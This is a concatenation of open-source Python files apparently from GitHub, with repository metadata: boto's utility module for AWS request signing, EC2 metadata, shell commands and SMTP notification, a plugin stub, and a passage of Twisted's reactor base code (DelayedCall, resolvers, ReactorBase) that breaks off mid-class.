"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "SoftLayer/tests/CLI/modules/config_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "DIGITAL Command Language",
"bytes": "854"
},
{
"name": "Python",
"bytes": "744378"
}
],
"symlink_target": ""
} |
"""
Some handy utility functions used by several classes.
"""
import re
import urllib
import urllib2
import subprocess
import StringIO
import time
import logging.handlers
import boto
import tempfile
import smtplib
import datetime
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import formatdate
from email import Encoders
try:
import hashlib
_hashfn = hashlib.sha512
except ImportError:
import md5
_hashfn = md5.md5
METADATA_PREFIX = 'x-amz-meta-'
AMAZON_HEADER_PREFIX = 'x-amz-'
# generates the aws canonical string for the given parameters
def canonical_string(method, path, headers, expires=None):
interesting_headers = {}
for key in headers:
lk = key.lower()
if lk in ['content-md5', 'content-type', 'date'] or lk.startswith(AMAZON_HEADER_PREFIX):
interesting_headers[lk] = headers[key].strip()
# these keys get empty strings if they don't exist
if not interesting_headers.has_key('content-type'):
interesting_headers['content-type'] = ''
if not interesting_headers.has_key('content-md5'):
interesting_headers['content-md5'] = ''
# just in case someone used this. it's not necessary in this lib.
if interesting_headers.has_key('x-amz-date'):
interesting_headers['date'] = ''
# if you're using expires for query string auth, then it trumps date
# (and x-amz-date)
if expires:
interesting_headers['date'] = str(expires)
sorted_header_keys = interesting_headers.keys()
sorted_header_keys.sort()
buf = "%s\n" % method
for key in sorted_header_keys:
val = interesting_headers[key]
if key.startswith(AMAZON_HEADER_PREFIX):
buf += "%s:%s\n" % (key, val)
else:
buf += "%s\n" % val
# don't include anything after the first ? in the resource...
buf += "%s" % path.split('?')[0]
# ...unless there is an acl or torrent parameter
if re.search("[&?]acl($|=|&)", path):
buf += "?acl"
elif re.search("[&?]logging($|=|&)", path):
buf += "?logging"
elif re.search("[&?]torrent($|=|&)", path):
buf += "?torrent"
elif re.search("[&?]location($|=|&)", path):
buf += "?location"
elif re.search("[&?]requestPayment($|=|&)", path):
buf += "?requestPayment"
elif re.search("[&?]versions($|=|&)", path):
buf += "?versions"
elif re.search("[&?]versioning($|=|&)", path):
buf += "?versioning"
else:
m = re.search("[&?]versionId=([^&]+)($|=|&)", path)
if m:
buf += '?versionId=' + m.group(1)
return buf
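# Illustrative sketch, not part of the original module: one way canonical_string()
# might be called when building the string-to-sign for a GET request. The bucket,
# key, and header values below are made-up placeholders.
def _example_canonical_string():
    headers = {'Date': 'Thu, 17 Nov 2005 18:49:58 GMT',
               'Content-Type': 'text/plain',
               'x-amz-meta-author': 'someone@example.com'}
    # The result would normally be HMAC-signed with the AWS secret key and
    # placed in the Authorization header.
    return canonical_string('GET', '/example-bucket/example-key', headers)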
def merge_meta(headers, metadata):
final_headers = headers.copy()
for k in metadata.keys():
if k.lower() in ['cache-control', 'content-md5', 'content-type',
'content-encoding', 'content-disposition',
'date', 'expires']:
final_headers[k] = metadata[k]
else:
final_headers[METADATA_PREFIX + k] = metadata[k]
return final_headers
def get_aws_metadata(headers):
metadata = {}
for hkey in headers.keys():
if hkey.lower().startswith(METADATA_PREFIX):
val = urllib.unquote_plus(headers[hkey])
metadata[hkey[len(METADATA_PREFIX):]] = unicode(val, 'utf-8')
del headers[hkey]
return metadata
def retry_url(url, retry_on_404=True):
for i in range(0, 10):
try:
req = urllib2.Request(url)
resp = urllib2.urlopen(req)
return resp.read()
except urllib2.HTTPError, e:
# in 2.6 you use getcode(), in 2.5 and earlier you use code
if hasattr(e, 'getcode'):
code = e.getcode()
else:
code = e.code
if code == 404 and not retry_on_404:
return ''
except:
pass
boto.log.exception('Caught exception reading instance data')
time.sleep(2**i)
boto.log.error('Unable to read instance data, giving up')
return ''
def _get_instance_metadata(url):
d = {}
data = retry_url(url)
if data:
fields = data.split('\n')
for field in fields:
if field.endswith('/'):
d[field[0:-1]] = _get_instance_metadata(url + field)
else:
p = field.find('=')
if p > 0:
key = field[p+1:]
resource = field[0:p] + '/openssh-key'
else:
key = resource = field
val = retry_url(url + resource)
p = val.find('\n')
if p > 0:
val = val.split('\n')
d[key] = val
return d
def get_instance_metadata(version='latest'):
"""
Returns the instance metadata as a nested Python dictionary.
Simple values (e.g. local_hostname, hostname, etc.) will be
stored as string values. Values such as ancestor-ami-ids will
be stored in the dict as a list of string values. More complex
    fields such as public-keys will be stored as nested dicts.
"""
url = 'http://169.254.169.254/%s/meta-data/' % version
return _get_instance_metadata(url)
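# Illustrative sketch, not part of the original module: reading a couple of common
# values from the metadata dict. This only works from inside an EC2 instance,
# since it queries the 169.254.169.254 metadata service.
def _example_instance_metadata():
    md = get_instance_metadata()
    return md.get('instance-id'), md.get('ami-id')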
def get_instance_userdata(version='latest', sep=None):
url = 'http://169.254.169.254/%s/user-data' % version
user_data = retry_url(url, retry_on_404=False)
if user_data:
if sep:
l = user_data.split(sep)
user_data = {}
for nvpair in l:
t = nvpair.split('=')
user_data[t[0].strip()] = t[1].strip()
return user_data
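# Illustrative sketch, not part of the original module: if the instance was launched
# with user data of the hypothetical form "color=red|size=large", passing sep='|'
# returns a dict instead of the raw string.
def _example_instance_userdata():
    ud = get_instance_userdata(sep='|')
    if isinstance(ud, dict):
        return ud.get('color')
    return ud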
ISO8601 = '%Y-%m-%dT%H:%M:%SZ'
def get_ts(ts=None):
if not ts:
ts = time.gmtime()
return time.strftime(ISO8601, ts)
def parse_ts(ts):
return datetime.datetime.strptime(ts, ISO8601)
def find_class(module_name, class_name=None):
if class_name:
module_name = "%s.%s" % (module_name, class_name)
modules = module_name.split('.')
c = None
try:
for m in modules[1:]:
if c:
c = getattr(c, m)
else:
c = getattr(__import__(".".join(modules[0:-1])), m)
return c
except:
return None
def update_dme(username, password, dme_id, ip_address):
"""
Update your Dynamic DNS record with DNSMadeEasy.com
"""
dme_url = 'https://www.dnsmadeeasy.com/servlet/updateip'
dme_url += '?username=%s&password=%s&id=%s&ip=%s'
s = urllib2.urlopen(dme_url % (username, password, dme_id, ip_address))
return s.read()
def fetch_file(uri, file=None, username=None, password=None):
"""
    Fetch a file based on the URI provided. If you do not pass in a file
    pointer, a tempfile.NamedTemporaryFile is returned; None is returned
    if the file could not be retrieved.
The URI can be either an HTTP url, or "s3://bucket_name/key_name"
"""
boto.log.info('Fetching %s' % uri)
if file == None:
file = tempfile.NamedTemporaryFile()
try:
if uri.startswith('s3://'):
bucket_name, key_name = uri[len('s3://'):].split('/', 1)
c = boto.connect_s3()
bucket = c.get_bucket(bucket_name)
key = bucket.get_key(key_name)
key.get_contents_to_file(file)
else:
if username and password:
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, uri, username, password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
s = urllib2.urlopen(uri)
file.write(s.read())
file.seek(0)
except:
        boto.log.exception('Problem Retrieving file: %s' % uri)
        file = None
return file
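# Illustrative sketch, not part of the original module: fetching a file over HTTP
# into a temporary file. The URL is a placeholder; an "s3://bucket/key" URI would
# work the same way.
def _example_fetch_file():
    fp = fetch_file('http://example.com/some-config.txt')
    if fp is not None:
        return fp.read()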
class ShellCommand(object):
def __init__(self, command, wait=True):
self.exit_code = 0
self.command = command
self.log_fp = StringIO.StringIO()
self.wait = wait
self.run()
def run(self):
boto.log.info('running:%s' % self.command)
self.process = subprocess.Popen(self.command, shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if(self.wait):
while self.process.poll() == None:
time.sleep(1)
t = self.process.communicate()
self.log_fp.write(t[0])
self.log_fp.write(t[1])
boto.log.info(self.log_fp.getvalue())
self.exit_code = self.process.returncode
return self.exit_code
def setReadOnly(self, value):
raise AttributeError
def getStatus(self):
return self.exit_code
status = property(getStatus, setReadOnly, None, 'The exit code for the command')
def getOutput(self):
return self.log_fp.getvalue()
output = property(getOutput, setReadOnly, None, 'The STDIN and STDERR output of the command')
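# Illustrative sketch, not part of the original module: ShellCommand runs the
# command from its constructor, so the status and output are available right away.
def _example_shell_command():
    cmd = ShellCommand('echo hello')
    return cmd.status, cmd.output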
class AuthSMTPHandler(logging.handlers.SMTPHandler):
"""
This class extends the SMTPHandler in the standard Python logging module
to accept a username and password on the constructor and to then use those
credentials to authenticate with the SMTP server. To use this, you could
add something like this in your boto config file:
[handler_hand07]
class=boto.utils.AuthSMTPHandler
level=WARN
formatter=form07
args=('localhost', 'username', 'password', 'from@abc', ['user1@abc', 'user2@xyz'], 'Logger Subject')
"""
def __init__(self, mailhost, username, password, fromaddr, toaddrs, subject):
"""
Initialize the handler.
We have extended the constructor to accept a username/password
for SMTP authentication.
"""
logging.handlers.SMTPHandler.__init__(self, mailhost, fromaddr, toaddrs, subject)
self.username = username
self.password = password
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
It would be really nice if I could add authorization to this class
without having to resort to cut and paste inheritance but, no.
"""
try:
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port)
smtp.login(self.username, self.password)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
','.join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
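# Illustrative sketch, not part of the original module: wiring the handler up from
# code instead of a boto config file. The host, credentials, and addresses are
# placeholders.
def _example_auth_smtp_handler():
    handler = AuthSMTPHandler('smtp.example.com', 'username', 'password',
                              'from@example.com', ['ops@example.com'],
                              'boto log message')
    handler.setLevel(logging.WARN)
    logger = logging.getLogger('boto.example')
    logger.addHandler(handler)
    return logger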
class LRUCache(dict):
"""A dictionary-like object that stores only a certain number of items, and
discards its least recently used item when full.
>>> cache = LRUCache(3)
>>> cache['A'] = 0
>>> cache['B'] = 1
>>> cache['C'] = 2
>>> len(cache)
3
>>> cache['A']
0
Adding new items to the cache does not increase its size. Instead, the least
recently used item is dropped:
>>> cache['D'] = 3
>>> len(cache)
3
>>> 'B' in cache
False
Iterating over the cache returns the keys, starting with the most recently
used:
>>> for key in cache:
... print key
D
A
C
This code is based on the LRUCache class from Genshi which is based on
    Myghty's LRUCache from ``myghtyutils.util``, written
by Mike Bayer and released under the MIT license (Genshi uses the
BSD License). See:
http://svn.myghty.org/myghtyutils/trunk/lib/myghtyutils/util.py
"""
class _Item(object):
def __init__(self, key, value):
self.previous = self.next = None
self.key = key
self.value = value
def __repr__(self):
return repr(self.value)
def __init__(self, capacity):
self._dict = dict()
self.capacity = capacity
self.head = None
self.tail = None
def __contains__(self, key):
return key in self._dict
def __iter__(self):
cur = self.head
while cur:
yield cur.key
cur = cur.next
def __len__(self):
return len(self._dict)
def __getitem__(self, key):
item = self._dict[key]
self._update_item(item)
return item.value
def __setitem__(self, key, value):
item = self._dict.get(key)
if item is None:
item = self._Item(key, value)
self._dict[key] = item
self._insert_item(item)
else:
item.value = value
self._update_item(item)
self._manage_size()
def __repr__(self):
return repr(self._dict)
def _insert_item(self, item):
item.previous = None
item.next = self.head
if self.head is not None:
self.head.previous = item
else:
self.tail = item
self.head = item
self._manage_size()
def _manage_size(self):
while len(self._dict) > self.capacity:
del self._dict[self.tail.key]
if self.tail != self.head:
self.tail = self.tail.previous
self.tail.next = None
else:
self.head = self.tail = None
def _update_item(self, item):
if self.head == item:
return
previous = item.previous
previous.next = item.next
if item.next is not None:
item.next.previous = previous
else:
self.tail = previous
item.previous = None
item.next = self.head
self.head.previous = self.head = item
class Password(object):
"""
Password object that stores itself as SHA512 hashed.
"""
def __init__(self, str=None):
"""
        Load the string from an initial value; this should be the raw SHA512 hashed password
"""
self.str = str
def set(self, value):
self.str = _hashfn(value).hexdigest()
def __str__(self):
return str(self.str)
def __eq__(self, other):
if other == None:
return False
return str(_hashfn(other).hexdigest()) == str(self.str)
def __len__(self):
if self.str:
return len(self.str)
else:
return 0
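# Illustrative sketch, not part of the original module: only the hex digest is ever
# stored, and __eq__ hashes the candidate value before comparing.
def _example_password():
    p = Password()
    p.set('correct horse battery staple')
    assert p == 'correct horse battery staple'
    assert not (p == 'wrong guess')
    return str(p)  # the stored digest, not the plaintext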
def notify(subject, body=None, html_body=None, to_string=None, attachments=[], append_instance_id=True):
if append_instance_id:
subject = "[%s] %s" % (boto.config.get_value("Instance", "instance-id"), subject)
if not to_string:
to_string = boto.config.get_value('Notification', 'smtp_to', None)
if to_string:
try:
from_string = boto.config.get_value('Notification', 'smtp_from', 'boto')
msg = MIMEMultipart()
msg['From'] = from_string
msg['To'] = to_string
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
if body:
msg.attach(MIMEText(body))
if html_body:
part = MIMEBase('text', 'html')
part.set_payload(html_body)
Encoders.encode_base64(part)
msg.attach(part)
for part in attachments:
msg.attach(part)
smtp_host = boto.config.get_value('Notification', 'smtp_host', 'localhost')
# Alternate port support
if boto.config.get_value("Notification", "smtp_port"):
server = smtplib.SMTP(smtp_host, int(boto.config.get_value("Notification", "smtp_port")))
else:
server = smtplib.SMTP(smtp_host)
# TLS support
if boto.config.getbool("Notification", "smtp_tls"):
server.ehlo()
server.starttls()
server.ehlo()
smtp_user = boto.config.get_value('Notification', 'smtp_user', '')
smtp_pass = boto.config.get_value('Notification', 'smtp_pass', '')
if smtp_user:
server.login(smtp_user, smtp_pass)
server.sendmail(from_string, to_string, msg.as_string())
server.quit()
except:
boto.log.exception('notify failed')
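# Illustrative sketch, not part of the original module: sending a plain-text
# notification. This relies on the [Notification] smtp_* values being present in
# the boto config; without an smtp_to setting the call is a no-op.
def _example_notify():
    notify('disk usage warning', body='/var is at 91% capacity',
           append_instance_id=False)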
| {
"content_hash": "3aeb59d987f21da05e53231f94a1323f",
"timestamp": "",
"source": "github",
"line_count": 527,
"max_line_length": 105,
"avg_line_length": 31.874762808349146,
"alnum_prop": 0.5601857363971902,
"repo_name": "sorenh/cc",
"id": "255d42f6419b509881026ee7275bd346a318179b",
"size": "18545",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "vendor/boto/boto/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PHP",
"bytes": "707"
},
{
"name": "Python",
"bytes": "398663"
},
{
"name": "Shell",
"bytes": "12374"
}
],
"symlink_target": ""
} |
from .random_article import *
| {
"content_hash": "244e0d34c4dca3823be76a359265952b",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 29,
"avg_line_length": 30,
"alnum_prop": 0.7666666666666667,
"repo_name": "Naereen/cuisine",
"id": "b59a6a03a193acf519225f4f9771ddd002d994fb",
"size": "30",
"binary": false,
"copies": "78",
"ref": "refs/heads/master",
"path": "plugins/random_article/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "108439"
},
{
"name": "HTML",
"bytes": "16416"
},
{
"name": "Makefile",
"bytes": "4071"
},
{
"name": "Python",
"bytes": "111371"
},
{
"name": "Shell",
"bytes": "2537"
}
],
"symlink_target": ""
} |
"""
Very basic functionality for a Reactor implementation.
"""
from __future__ import division, absolute_import
import socket # needed only for sync-dns
from zope.interface import implementer, classImplements
import sys
import warnings
from heapq import heappush, heappop, heapify
import traceback
from twisted.internet.interfaces import (
IReactorCore, IReactorTime, IReactorThreads, IResolverSimple,
IReactorPluggableResolver, IReactorPluggableNameResolver, IConnector,
IDelayedCall,
)
from twisted.internet import fdesc, main, error, abstract, defer, threads
from twisted.internet._resolver import (
GAIResolver as _GAIResolver,
ComplexResolverSimplifier as _ComplexResolverSimplifier,
SimpleResolverComplexifier as _SimpleResolverComplexifier,
)
from twisted.python import log, failure, reflect
from twisted.python.compat import unicode, iteritems
from twisted.python.runtime import seconds as runtimeSeconds, platform
from twisted.internet.defer import Deferred, DeferredList
from twisted.python._oldstyle import _oldStyle
# This import is for side-effects! Even if you don't see any code using it
# in this module, don't delete it.
from twisted.python import threadable
@implementer(IDelayedCall)
@_oldStyle
class DelayedCall:
# enable .debug to record creator call stack, and it will be logged if
# an exception occurs while the function is being run
debug = False
_str = None
def __init__(self, time, func, args, kw, cancel, reset,
seconds=runtimeSeconds):
"""
@param time: Seconds from the epoch at which to call C{func}.
@param func: The callable to call.
@param args: The positional arguments to pass to the callable.
@param kw: The keyword arguments to pass to the callable.
@param cancel: A callable which will be called with this
DelayedCall before cancellation.
@param reset: A callable which will be called with this
DelayedCall after changing this DelayedCall's scheduled
execution time. The callable should adjust any necessary
scheduling details to ensure this DelayedCall is invoked
at the new appropriate time.
@param seconds: If provided, a no-argument callable which will be
used to determine the current time any time that information is
needed.
"""
self.time, self.func, self.args, self.kw = time, func, args, kw
self.resetter = reset
self.canceller = cancel
self.seconds = seconds
self.cancelled = self.called = 0
self.delayed_time = 0
if self.debug:
self.creator = traceback.format_stack()[:-2]
def getTime(self):
"""Return the time at which this call will fire
@rtype: C{float}
@return: The number of seconds after the epoch at which this call is
scheduled to be made.
"""
return self.time + self.delayed_time
def cancel(self):
"""Unschedule this call
@raise AlreadyCancelled: Raised if this call has already been
unscheduled.
@raise AlreadyCalled: Raised if this call has already been made.
"""
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
else:
self.canceller(self)
self.cancelled = 1
if self.debug:
            self._str = str(self)
del self.func, self.args, self.kw
def reset(self, secondsFromNow):
"""Reschedule this call for a different time
@type secondsFromNow: C{float}
@param secondsFromNow: The number of seconds from the time of the
C{reset} call at which this call will be scheduled.
@raise AlreadyCancelled: Raised if this call has been cancelled.
@raise AlreadyCalled: Raised if this call has already been made.
"""
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
else:
newTime = self.seconds() + secondsFromNow
if newTime < self.time:
self.delayed_time = 0
self.time = newTime
self.resetter(self)
else:
self.delayed_time = newTime - self.time
def delay(self, secondsLater):
"""Reschedule this call for a later time
@type secondsLater: C{float}
@param secondsLater: The number of seconds after the originally
scheduled time for which to reschedule this call.
@raise AlreadyCancelled: Raised if this call has been cancelled.
@raise AlreadyCalled: Raised if this call has already been made.
"""
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
else:
self.delayed_time += secondsLater
if self.delayed_time < 0:
self.activate_delay()
self.resetter(self)
def activate_delay(self):
self.time += self.delayed_time
self.delayed_time = 0
def active(self):
"""Determine whether this call is still pending
@rtype: C{bool}
@return: True if this call has not yet been made or cancelled,
False otherwise.
"""
return not (self.cancelled or self.called)
def __le__(self, other):
"""
Implement C{<=} operator between two L{DelayedCall} instances.
Comparison is based on the C{time} attribute (unadjusted by the
delayed time).
"""
return self.time <= other.time
def __lt__(self, other):
"""
Implement C{<} operator between two L{DelayedCall} instances.
Comparison is based on the C{time} attribute (unadjusted by the
delayed time).
"""
return self.time < other.time
def __str__(self):
if self._str is not None:
return self._str
if hasattr(self, 'func'):
# This code should be replaced by a utility function in reflect;
# see ticket #6066:
if hasattr(self.func, '__qualname__'):
func = self.func.__qualname__
elif hasattr(self.func, '__name__'):
func = self.func.func_name
if hasattr(self.func, 'im_class'):
func = self.func.im_class.__name__ + '.' + func
else:
func = reflect.safe_repr(self.func)
else:
func = None
now = self.seconds()
L = ["<DelayedCall 0x%x [%ss] called=%s cancelled=%s" % (
id(self), self.time - now, self.called,
self.cancelled)]
if func is not None:
L.extend((" ", func, "("))
if self.args:
L.append(", ".join([reflect.safe_repr(e) for e in self.args]))
if self.kw:
L.append(", ")
if self.kw:
L.append(", ".join(['%s=%s' % (k, reflect.safe_repr(v)) for (k, v) in self.kw.items()]))
L.append(")")
if self.debug:
L.append("\n\ntraceback at creation: \n\n%s" % (' '.join(self.creator)))
L.append('>')
return "".join(L)
@implementer(IResolverSimple)
class ThreadedResolver(object):
"""
L{ThreadedResolver} uses a reactor, a threadpool, and
L{socket.gethostbyname} to perform name lookups without blocking the
    reactor thread. It also supports timeouts independently from whatever
timeout logic L{socket.gethostbyname} might have.
@ivar reactor: The reactor the threadpool of which will be used to call
L{socket.gethostbyname} and the I/O thread of which the result will be
delivered.
"""
def __init__(self, reactor):
self.reactor = reactor
self._runningQueries = {}
def _fail(self, name, err):
err = error.DNSLookupError("address %r not found: %s" % (name, err))
return failure.Failure(err)
def _cleanup(self, name, lookupDeferred):
userDeferred, cancelCall = self._runningQueries[lookupDeferred]
del self._runningQueries[lookupDeferred]
userDeferred.errback(self._fail(name, "timeout error"))
def _checkTimeout(self, result, name, lookupDeferred):
try:
userDeferred, cancelCall = self._runningQueries[lookupDeferred]
except KeyError:
pass
else:
del self._runningQueries[lookupDeferred]
cancelCall.cancel()
if isinstance(result, failure.Failure):
userDeferred.errback(self._fail(name, result.getErrorMessage()))
else:
userDeferred.callback(result)
def getHostByName(self, name, timeout = (1, 3, 11, 45)):
"""
See L{twisted.internet.interfaces.IResolverSimple.getHostByName}.
Note that the elements of C{timeout} are summed and the result is used
as a timeout for the lookup. Any intermediate timeout or retry logic
is left up to the platform via L{socket.gethostbyname}.
"""
if timeout:
timeoutDelay = sum(timeout)
else:
timeoutDelay = 60
userDeferred = defer.Deferred()
lookupDeferred = threads.deferToThreadPool(
self.reactor, self.reactor.getThreadPool(),
socket.gethostbyname, name)
cancelCall = self.reactor.callLater(
timeoutDelay, self._cleanup, name, lookupDeferred)
self._runningQueries[lookupDeferred] = (userDeferred, cancelCall)
lookupDeferred.addBoth(self._checkTimeout, name, lookupDeferred)
return userDeferred
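# Illustrative sketch, not part of the original module: a non-blocking lookup with
# ThreadedResolver. It assumes a running reactor with thread support; the hostname
# is a placeholder.
def _exampleThreadedResolver():
    from twisted.internet import reactor
    resolver = ThreadedResolver(reactor)
    d = resolver.getHostByName("example.com")
    d.addCallbacks(log.msg, log.err)
    return d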
@implementer(IResolverSimple)
@_oldStyle
class BlockingResolver:
def getHostByName(self, name, timeout = (1, 3, 11, 45)):
try:
address = socket.gethostbyname(name)
except socket.error:
msg = "address %r not found" % (name,)
err = error.DNSLookupError(msg)
return defer.fail(err)
else:
return defer.succeed(address)
class _ThreePhaseEvent(object):
"""
Collection of callables (with arguments) which can be invoked as a group in
a particular order.
This provides the underlying implementation for the reactor's system event
triggers. An instance of this class tracks triggers for all phases of a
single type of event.
@ivar before: A list of the before-phase triggers containing three-tuples
of a callable, a tuple of positional arguments, and a dict of keyword
arguments
@ivar finishedBefore: A list of the before-phase triggers which have
already been executed. This is only populated in the C{'BEFORE'} state.
@ivar during: A list of the during-phase triggers containing three-tuples
of a callable, a tuple of positional arguments, and a dict of keyword
arguments
@ivar after: A list of the after-phase triggers containing three-tuples
of a callable, a tuple of positional arguments, and a dict of keyword
arguments
@ivar state: A string indicating what is currently going on with this
object. One of C{'BASE'} (for when nothing in particular is happening;
this is the initial value), C{'BEFORE'} (when the before-phase triggers
are in the process of being executed).
"""
def __init__(self):
self.before = []
self.during = []
self.after = []
self.state = 'BASE'
def addTrigger(self, phase, callable, *args, **kwargs):
"""
        Add a trigger to the indicated phase.
@param phase: One of C{'before'}, C{'during'}, or C{'after'}.
@param callable: An object to be called when this event is triggered.
@param *args: Positional arguments to pass to C{callable}.
@param **kwargs: Keyword arguments to pass to C{callable}.
@return: An opaque handle which may be passed to L{removeTrigger} to
reverse the effects of calling this method.
"""
if phase not in ('before', 'during', 'after'):
raise KeyError("invalid phase")
getattr(self, phase).append((callable, args, kwargs))
return phase, callable, args, kwargs
def removeTrigger(self, handle):
"""
Remove a previously added trigger callable.
@param handle: An object previously returned by L{addTrigger}. The
trigger added by that call will be removed.
@raise ValueError: If the trigger associated with C{handle} has already
been removed or if C{handle} is not a valid handle.
"""
return getattr(self, 'removeTrigger_' + self.state)(handle)
def removeTrigger_BASE(self, handle):
"""
Just try to remove the trigger.
@see: removeTrigger
"""
try:
phase, callable, args, kwargs = handle
except (TypeError, ValueError):
raise ValueError("invalid trigger handle")
else:
if phase not in ('before', 'during', 'after'):
raise KeyError("invalid phase")
getattr(self, phase).remove((callable, args, kwargs))
def removeTrigger_BEFORE(self, handle):
"""
Remove the trigger if it has yet to be executed, otherwise emit a
warning that in the future an exception will be raised when removing an
already-executed trigger.
@see: removeTrigger
"""
phase, callable, args, kwargs = handle
if phase != 'before':
return self.removeTrigger_BASE(handle)
if (callable, args, kwargs) in self.finishedBefore:
warnings.warn(
"Removing already-fired system event triggers will raise an "
"exception in a future version of Twisted.",
category=DeprecationWarning,
stacklevel=3)
else:
self.removeTrigger_BASE(handle)
def fireEvent(self):
"""
Call the triggers added to this event.
"""
self.state = 'BEFORE'
self.finishedBefore = []
beforeResults = []
while self.before:
callable, args, kwargs = self.before.pop(0)
self.finishedBefore.append((callable, args, kwargs))
try:
result = callable(*args, **kwargs)
except:
log.err()
else:
if isinstance(result, Deferred):
beforeResults.append(result)
DeferredList(beforeResults).addCallback(self._continueFiring)
def _continueFiring(self, ignored):
"""
Call the during and after phase triggers for this event.
"""
self.state = 'BASE'
self.finishedBefore = []
for phase in self.during, self.after:
while phase:
callable, args, kwargs = phase.pop(0)
try:
callable(*args, **kwargs)
except:
log.err()
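# Illustrative sketch, not part of the original module: the three phases of a single
# event type fire in before/during/after order regardless of registration order.
def _exampleThreePhaseEvent():
    event = _ThreePhaseEvent()
    event.addTrigger('after', log.msg, 'after trigger')
    event.addTrigger('before', log.msg, 'before trigger')
    event.addTrigger('during', log.msg, 'during trigger')
    event.fireEvent()   # logs before, then during, then after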
@implementer(IReactorCore, IReactorTime, IReactorPluggableResolver,
IReactorPluggableNameResolver)
class ReactorBase(object):
"""
Default base class for Reactors.
@type _stopped: C{bool}
@ivar _stopped: A flag which is true between paired calls to C{reactor.run}
and C{reactor.stop}. This should be replaced with an explicit state
machine.
@type _justStopped: C{bool}
@ivar _justStopped: A flag which is true between the time C{reactor.stop}
is called and the time the shutdown system event is fired. This is
used to determine whether that event should be fired after each
iteration through the mainloop. This should be replaced with an
explicit state machine.
@type _started: C{bool}
@ivar _started: A flag which is true from the time C{reactor.run} is called
until the time C{reactor.run} returns. This is used to prevent calls
to C{reactor.run} on a running reactor. This should be replaced with
an explicit state machine.
@ivar running: See L{IReactorCore.running}
@ivar _registerAsIOThread: A flag controlling whether the reactor will
register the thread it is running in as the I/O thread when it starts.
If C{True}, registration will be done, otherwise it will not be.
"""
_registerAsIOThread = True
_stopped = True
installed = False
usingThreads = False
resolver = BlockingResolver()
__name__ = "twisted.internet.reactor"
def __init__(self):
self.threadCallQueue = []
self._eventTriggers = {}
self._pendingTimedCalls = []
self._newTimedCalls = []
self._cancellations = 0
self.running = False
self._started = False
self._justStopped = False
self._startedBefore = False
# reactor internal readers, e.g. the waker.
self._internalReaders = set()
self._nameResolver = None
self.waker = None
# Arrange for the running attribute to change to True at the right time
# and let a subclass possibly do other things at that time (eg install
# signal handlers).
self.addSystemEventTrigger(
'during', 'startup', self._reallyStartRunning)
self.addSystemEventTrigger('during', 'shutdown', self.crash)
self.addSystemEventTrigger('during', 'shutdown', self.disconnectAll)
if platform.supportsThreads():
self._initThreads()
self.installWaker()
# override in subclasses
_lock = None
def installWaker(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement installWaker")
def installResolver(self, resolver):
"""
See L{IReactorPluggableResolver}.
@param resolver: see L{IReactorPluggableResolver}.
@return: see L{IReactorPluggableResolver}.
"""
assert IResolverSimple.providedBy(resolver)
oldResolver = self.resolver
self.resolver = resolver
self._nameResolver = _SimpleResolverComplexifier(resolver)
return oldResolver
def installNameResolver(self, resolver):
"""
See L{IReactorPluggableNameResolver}.
@param resolver: See L{IReactorPluggableNameResolver}.
@return: see L{IReactorPluggableNameResolver}.
"""
previousNameResolver = self._nameResolver
self._nameResolver = resolver
self.resolver = _ComplexResolverSimplifier(resolver)
return previousNameResolver
@property
def nameResolver(self):
"""
Implementation of read-only
L{IReactorPluggableNameResolver.nameResolver}.
"""
return self._nameResolver
def wakeUp(self):
"""
Wake up the event loop.
"""
if self.waker:
self.waker.wakeUp()
# if the waker isn't installed, the reactor isn't running, and
# therefore doesn't need to be woken up
def doIteration(self, delay):
"""
Do one iteration over the readers and writers which have been added.
"""
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement doIteration")
def addReader(self, reader):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement addReader")
def addWriter(self, writer):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement addWriter")
def removeReader(self, reader):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement removeReader")
def removeWriter(self, writer):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement removeWriter")
def removeAll(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement removeAll")
def getReaders(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement getReaders")
def getWriters(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement getWriters")
def resolve(self, name, timeout = (1, 3, 11, 45)):
"""Return a Deferred that will resolve a hostname.
"""
if not name:
# XXX - This is *less than* '::', and will screw up IPv6 servers
return defer.succeed('0.0.0.0')
if abstract.isIPAddress(name):
return defer.succeed(name)
return self.resolver.getHostByName(name, timeout)
# Installation.
# IReactorCore
def stop(self):
"""
See twisted.internet.interfaces.IReactorCore.stop.
"""
if self._stopped:
raise error.ReactorNotRunning(
"Can't stop reactor that isn't running.")
self._stopped = True
self._justStopped = True
self._startedBefore = True
def crash(self):
"""
See twisted.internet.interfaces.IReactorCore.crash.
Reset reactor state tracking attributes and re-initialize certain
state-transition helpers which were set up in C{__init__} but later
destroyed (through use).
"""
self._started = False
self.running = False
self.addSystemEventTrigger(
'during', 'startup', self._reallyStartRunning)
def sigInt(self, *args):
